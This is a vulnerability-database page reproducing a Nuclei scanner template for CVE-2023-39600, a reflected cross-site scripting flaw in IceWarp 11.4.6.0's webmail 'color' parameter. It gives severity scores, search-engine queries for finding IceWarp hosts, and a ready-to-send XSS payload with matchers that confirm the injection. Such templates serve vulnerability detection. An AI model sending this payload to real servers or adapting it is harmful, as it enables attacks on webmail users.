Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-39600
HistorySep 10, 2023 - 6:24 a.m.

IceWarp 11.4.6.0 - Cross-Site Scripting

2023-09-1006:24:39
ProjectDiscovery
github.com
2
icewarp
xss
vulnerability
javascript
browser
data theft
unauthorized actions
cve2023

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

30.9%

IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
id: CVE-2023-39600

info:
  name: IceWarp 11.4.6.0 - Cross-Site Scripting
  author: Imjust0
  severity: medium
  description: |
    IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
  reference:
    - https://medium.com/@katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39600
    - https://icewarp.com
    - https://medium.com/%40katikitala.sushmitha078/cross-site-scripting-reflected-xss-in-icewarp-server-cve-2023-39600-310a7e1c8817
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-39600
    cwe-id: CWE-79
    epss-score: 0.00071
    epss-percentile: 0.30401
    cpe: cpe:2.3:a:icewarp:icewarp:11.4.6.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: icewarp
    product: icewarp
    shodan-query:
      - title:"icewarp"
      - http.favicon.hash:2144485375
      - http.title:"icewarp"
    fofa-query:
      - title="icewarp"
      - icon_hash=2144485375
    google-query: intitle:"icewarp"
  tags: cve,cve2023,icewarp,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/webmail/?color="><img src=x onerror=confirm(document.domain)>'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<img src=x onerror=confirm(document.domain)>"
          - "IceWarp"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a004630440220223da6b4cc7f2ee5e43255592d8c512cb4515155f974d5690551bb55b44b73fc02200baec7d7281c07eccf1b162ce42f9d46f68999c589f704af58c07bd958e679d3:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

30.9%

Related for NUCLEI:CVE-2023-39600